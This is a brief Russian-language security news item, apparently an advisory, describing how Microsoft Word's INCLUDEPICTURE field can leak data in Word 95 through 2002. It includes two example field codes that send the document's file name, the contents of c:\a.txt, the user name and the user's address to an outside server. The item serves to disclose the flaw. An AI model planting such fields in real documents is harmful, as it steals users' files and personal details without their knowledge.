Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример: 

{INCLUDEPICTURE {QUOTE "http:\\www.alicesserver.com\" & {FILENAME \p} & {INCLUDETEXT
"c:\\a.txt"}} \d } 
{INCLUDEPICTURE {QUOTE "http:\\www.alicesserver.com\" & {USERNAME} & {USERADDRESS } } \d}

Уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии